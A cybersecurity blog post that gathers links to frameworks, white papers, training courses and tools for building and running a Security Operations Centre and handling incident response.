Search

vulnerablelife

Vulnerable Life by Vulneraman | Cyber Security Blog

How To Build And Run A SOC for Incident Response – A Collection Of Resources

How to build a SOC / How to run a SOC

In this resource I’ll locate some great resources for SOC, how to build a SOC, how to set-up a SOC and how to run and maintain your SOC once set up. I will also keep the links and tools up to date as I find new & better resources.

Let me know if you have comments or additions please.

_________

1- Starting Point – Some theoretical content:

What is a SOC? A SOC is a Security operations centre‍, where you have people dedicated to the company’s ongoing information security watching and responding. They need the tools to prevent what they can and discover+remediate what they can not. They need the skills to do this.

Free:

IR process template via Frode Hommedal: http://frodehommedal.no/presentations/first-tc-oslo-2015/#/slide-start

CSIRT process, new one by Frode Hommedal: http://frodehommedal.no/presentations/cert-ee-symposium-2016/#/

Report Template for Threat Intelligence and Incident Response by Lenny Zeltser

MITREhttps://www.mitre.org/sites/default/files/publications/pr-13-1028-mitre-10-strategies-cyber-ops-center.pdf

Building a SOC via twitter user Rafeeq_rehman Building_SOC.pdf

An EY SOC white paperEY-SOC-Oct-2013.pdf

A HP SOC white paper: Building-Maturing-and-Rocking-a-Security-Operations-Center-Brandie-Anderson.pdf

The Grand List of Incident Management Frameworks via Gabor Szathmari

A slidedeck on building a SOC via Slideshare:

Design & Build a Security Operation Center – from Sameer Paradia (CGEIT,CISM,CISSP)

SANS https://www.sans.org/reading-room/whitepapers/analyst/incident-response-fight-35342

OWASP incident response project https://www.owasp.org/index.php/OWASP_Incident_Response_Project
via Tom Brennan

RSA conference presentation 2012 Ben RothkeBuilding a Security Operations Center(SOC) 
McAfee – Creating and Maintaining a SOC – The details behind successful security operations centers

emc Creating an intelligence-driven SOC

Peerlyst resource: A list of Incident Response Playbooks by Michael Hamblin

Building a World-Class Security Operations Center:A Roadmap by SANS

How to build and runa SecurityOperations Center by Nicolas Fischbach of Securite

Building and running a SOC with Splunk

Lessons learned from working in a SOC by Jen Andre of Komand

“Build a SOC or Choose an MSSP?” by Eric Carroll

How to build and run a Security Operations Center by Renato Basante Borbolla

Requiring sign-up:

AlienVault https://www.alienvault.com/resource-center/ebook/insider-guide-to-incident-response-download

Dell SecureWorks http://go.secureworks.co.uk/incident-response-preparedness

Paid:

Designing and Building Security Operations Center 1st Edition by David Nathans

Security Operations Center: Building, Operating, and Maintaining your SOC from October 2015 by Joseph Muniz, Gary McIntyre, Nadhem AlFardan

Crafting the InfoSec Playbook. Security Monitoring and Incident Response Master Plan” by Jeff Bollinger, Brandon Enright, Matthew Valites. Thanks Sashank Dara‍ for mentioning this.

2- Some Practical resources for incident response and SOC

Cheat Sheets:

http://www.malwarearchaeology.com/cheat-sheets

Awesome Incident response collection

Training/Certifications:
A critique of the parts/elements of paid incident handling‍ certfications via Taosecurity‍:

http://taosecurity.blogspot.lu/2009/04/speaking-of-incident-response.html

Free:

Computer and hackingforensics on Cybrary.ithttps://www.cybrary.it/course/computer-hacking-forensics-analyst/

Most of Opensecuritytraining http://opensecuritytraining.info/Training.html

Paid:

SANS‍ MGT517: managing Security Operations: Detection, Response, and Intelligencehttps://www.sans.org/course/managing-security-operations-detection-response-and-intelligence

https://www.sans.org/course/continuous-monitoring-security-operations Sec511

EC-Council Certified incident Handler http://www.eccouncil.org/Certification/ec-council-certified-incident-handler

GIAC Certified incident Handler (GCIH) https://www.giac.org/certification/certified-incident-handler-gcih

cert-Certified Computer Security incident Handler https://www.sei.cmu.edu/training/certificates/security/handler.cfm

Incident response and network forensics on Infosecinstitute

SANS SEC504hackertools, techniquesExploits and incident handling

SANS Cyber defensehttps://www.sans.org/curricula

SANS Master degree in Incident response: https://www.sans.edu/academics/certificates/incident-response

3. Tools of the trade:

Open Source/Free:

The list of tools here on postmodernsecurity.com :
https://postmodernsecurity.com/2015/09/11/malware-analysis-and-incident-response-tools-for-the-frugal-and-lazy/

IP TO ASN via Teamcymru. IP To ASN allows one to map IP numbers to BGP prefixes and ASNs. These services come in various flavors, including whois (TCP 43), dns (UDP 53), HTTP (TCP 80) and HTTPS (TCP 443).

TOTALHASH totalhash provides static and dynamic analysis of malware samples. The data available on this site is free for non commercial use. If you have samples that you would like analyzed you may upload them to our anonymous FTP server.

Via InfosecTDK‍ https://www.hybrid-analysis.com An automated malware analysis sandbox

Malwr malwr is a free malware analysis service and community launched in January 2011. You can submit files to it and receive the results of a complete dynamic analysis back.

Via CIRCL.LU:

Twitter user DA_667 storify on questions to ask when hiring an incident responder – storify created by

DA_667 on IR toolset on a shoestring budget using World of warcraft analogies:

SIEMelk stack
NSMSnort + Bro (with fullcap/flow later on when/if I had money)
Client-Side: GRR + El-Jefe + whatever crap A/V solution
Heroic Mode Extra credit: Packet Fence for shunting infected machines into a ?GTFO? VLAN for re-imaging/IR purposes
25-man RAID mode: Moloch for FPC.

Remote IOC scannerhttps://github.com/CERT-Solucom/certitude

Defeating pth attacks via DFIRBLOG

Free service that unpacks, scans and analyzes almost any firmware package, detects vulnerabilitiesbackdoors -> firmware.refirmware.re

usb packet capture/sniffer http://desowin.org/usbpcap/

Javascript deobfuscator toolhttp://www.kahusecurity.com/2015/new-javascript-deobfuscator-tool/

Live Incident response in powershell: PSRecon https://github.com/gfoss/PSRecon

List all named pipes via powershell:

PS C:\> [System.IO.Directory]::GetFiles("\\.\\pipe\\")Securityonion and Sysmon (slides)

Security onion Conference – 2015 from DefensiveDepth

Windows Live Artifact acquisition scripthttps://github.com/OMENScan/AChoir

LAIKA BOSS open sourced by lockheed martin https://github.com/lmco/laikaboss/blob/master/README.md

Via mozilla open sourced: incident investigations: MIG “Mozllla InvestiGator”: github.com/mozilla/mig

88 Feeds, ~800K live streamable threat Intel indicators to your sensors (link) via @critical stack

Incident response hunting tools: https://sroberts.github.io/2015/04/21/hunting-tools/

Share threat information with vetted partners -> ThreatExchange via the Facebook team

Cymon: Cymon is the largest tracker of open-source security reports about phishing, malware, botnets and other maliciousactivities.

NBDServer: Network block Device server for windows with a DFIR/forensic focus via Jeff Bryner

PYIOCpython tools for IOC (Indicator of Compromise) handling via Jeff Bryner

MozDef: The mozilladefense platform – automation of the security incident handling process and facilitate the real-timeactivities of incident handlers. Also via Jeff Bryner (suggested by @sastrytumuluri )

Maltrail: Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user defined lists

FIDO by the netflix team for automating incident response.

FIDO is an orchestration layer used to automate the incident response process by evaluating, assessing and responding to malware. Fido?s primary purpose is to handle the heavy manual effort needed to evaluate threats coming from today’s security stack and the large number of alerts generated by them. As an orchestration platform fido can make using your existing security tools more efficient and accurate by heavily reducing the manual effort needed to detect, notify and respond to attacks against a network.

Fast IR Collector by Sekoialab

This tool collects different artefacts on live windows and records the results in csv files. With the analyses of this artefacts, an early compromission can be detected.

Kansa: A powershell incident response framework

Fast Incident Response by cert societe generale

The awesome Incident Response Collection

SCOT:

The Sandia Cyber Omni Tracker (SCOT) is a cyber security incident response management system and knowledge base. Designed by cyber security incident respondersSCOT provides a new approach to manage security alertsanalyze data for deeper patterns, coordinate team efforts, and capture team knowledge. SCOT integrates with existing security applications to provide a consistent, easy to use interface that enhances analyst effectiveness.

LOKI:

Loki – Simple IOC and Incident Response scanner https://www.bsk-consulting.de/loki-free-ioc-scanner/

Volatility & Volatility Autoruns:

Volatility autoruns pluginFinding persistence points (also called ” auto-Start Extensibility Points”, or ASEPs) is a recurring task of any investigation potentially involving malware.To make an analyst’s life a BIT easier, I came up with theautoruns plugin. autoruns basically automates most of the tasks you would need to run when trying to find out where malware is persisting from. Once all the autostart locations are found, they are matched with running processes in memory.

IR_Tool: A simple bash script for digital forensic on linux/unix system

Malcom: Malware Communication Analyzer

Malcom is a tool designed to analyze a system’s network communication using graphical representations of network traffic, and cross-reference them with known malware sources. This comes handy when analyzing how certain malware species try to communicate with the outside world.

YARA – The pattern matching swiss knife

IRTriage – Incident Response Triage – Windows evidence Collection for forensic analysis

Skydive: An Open Source real-time network topology and protocols analyzer

EMET 5.5. Always relevant to use, especially now that it can block Casey Smith’s (SubTee) regsrv32 applocker bypass. Instructions on that here.

reassemble_dns – NICE tool 2 read pcap files, extract DNS messages &write them into file. IP fragments + TCP streams r reassembled

Mandiant‍ Redline‍ (free and open source) https://www.fireeye.com/services/freeware/redline.html

ANZ Nighthawk‍ / NighthawkResponse‍ is a new incident response tool‍ for Mandiant Redlinehttps://github.com/biggiesmallsAG/nightHawkResponse

DNStwistCrazyParser– Identify typosquatting phishing domains

DNS Probe‍ and DNS_analyze‍ -> Identify, capture and analyze DNS traffic. Linkand Link.

Good tool collection by category on dfir.training blog: http://www.dfir.training/index.php/tools/new

OSXCollector which has now been turned into AMIRA: Automated Malware Incident Response & Analysis

Strake-IR‍ from 9yahds is a Security Incident Response Orchestration solution, 2 seat subscription is free.

IRMA Incident Response Malware Analysis. Today’s defense is not only about learning about a file, but it is also getting a fine overview of the incident you dealt with: where / when a malicious file has been seen, who submitted a hash, where a hash has been noticed, which anti-virus detects it. IRMA intends to be an open-source platform designed to help identifying and analyzing malicious files.

New (Nov, 2016): Introducing TheHive: a Scalable, Open Source and Free Incident Response Platform blog.thehive-project.org/2016/11/07/int…

140 free forensics toolshttps://forensiccontrol.com/resources/free-software/

_________

Commercial solutions:

Syncurity IR – Implement a repeatable, scalable, auditable process across your entire security operations and incident response lifecycle.

The Demisto platform – The automation and Collaboration Platform for your security operations center (evaluation of this needed, please let me know if you’ve used this).

Using RiskIQ Inc.‍ Passivetotal‍ for Automated Infrastructure Alerts

Strake-IR‍ from 9yahds is a Security Incident Response Orchestration solution, 2 seat subscription is free. http://9yahds.com/

_________

4. Relevant Blogs/Slides:

Introduction to DFIR https://sroberts.github.io/2016/01/11/introduction-to-dfir-the-beginning

Free reverse engineering tools list https://wiremask.eu/articles/free-reverse-engineering-tools/

(In time this will be completed: https://www.peerlyst.com/blog-post/resource-incident-response-guide)

Incident response must improve! https://www.peerlyst.com/blog-post/security-incident-response-must-improve

Preparing for Incident Response https://www.peerlyst.com/blog-post/incident-response-preparation

Getting Management Buy-in for IR https://blog.peerlyst.com/blog-post/incident-response-management-buyin

Dealing with analyst fatigue https://www.peerlyst.com/blog-post/incident-response-how-do-you-deal-with-analyst-fatigue

The importance of process https://www.peerlyst.com/blog-post/incident-response-the-importance-of-process

Infosecinstitute on SOC: http://resources.infosecinstitute.com/security-operations-center/

10 attributes of a leading SOC https://www.rooksecurity.com/10-attributes-of-a-leading-security-operations-center-soc-in-2014-2/

Automating Forensic Artifact Collection with Splunk and GRR (link)

NoSQL forensics

Report template for threat intelligence and Incident Response (link)

+Added: MS Ignore presentation: Windows Event Forwarding / Centralized logging for everyone via Jessica Payne

How to Manage a Large Volume of Cyber Alerts via securityweek

Extracting a PCAP from memory https://isc.sans.edu/forums/diary/Extracting+pcap+from+memory/20639

Windows commands Abused by attackers http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

Windows 10 and enhanced powershell logging https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html

From RSAC‍ 2016 by Mark Russinovich:

“Machine Learning and the Cloud: Disrupting Threat Detection and Prevention”

From RSAC‍ 2016 by Mark Russinovich:

“Tracking Hackers on Your Network with Sysinternals Sysmon”

crowdstrike‍ blog: Recon detection by the blue teamhttp://www.crowdstrike.com/blog/reconnaissance-detection-blue-team/

Improving Incident Response Investigations by JP Bourget‍ https://www.peerlyst.com/posts/improving-incident-response-investigations-jp-bourget-1

WMI persistence‍ blog and how to detect this persistence: http://windowsir.blogspot.lu/2016/04/cool-stuff-re-wmi-persistence.html which includes links to Matt Graeers blackhat US 2015 presentation paper on this topic. and and the DellSecureworks blog about their discovery

Basic Snort Rules Syntax and Usage

SubTee SCT persistence module: https://github.com/subTee/SCTPersistence -> useful to know and be able to detect

Hacking exposed: Computer forensics blog by David Cowen. Lots of good forensics advice to be found.

From BsidesCharm: Hunting threat actors with TLS certificates. Using open source data to defend networks by Mark Parsons / @markpars0ns / mark at accessviolation.org

ELF Shared Library Injection Forensics via backtrace.io

Detecting DNS Tunnels with Packetbeat and Watcher

Data observed from monitoring DNS traffic on a network can be used as an indicator of compromise (IOC). This blog post will discuss how elasticsearch and Watcher can be used with Packetbeat to alert when possible malware activity is detected. Packetbeat is our open source packet analyzer.

Not all IOC scanning is the sameScan that which helps you via BSK-Consulting.

Adversarial Tactics, Techniques, and Common Knowledge by Mitre

Outsourcing the SOC function can make sense. Use cases for managed security services via Securosis‍ thanks Sashank Dara‍ for the link

Diagnosis SOC-atrophy‍ : What To Do When Your Security Operation Center Gets Sick

Proxy server logs for incident response https://www.vanimpe.eu/2016/10/21/proxy-server-logs-incident-response/ via Koen Van‍

Advice on setting up a SOC or multiple SOCs in 1 organizationhttp://www.montance.com/mgt517/#/5/7

Threat hunting for SOCs via Raffael Marty‍:

Original Post: https://www.peerlyst.com/posts/how-to-build-and-run-a-soc-for-incident-response-and-enterprise-defensibility-a-collection-of-resources

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Up ↑

%d bloggers like this: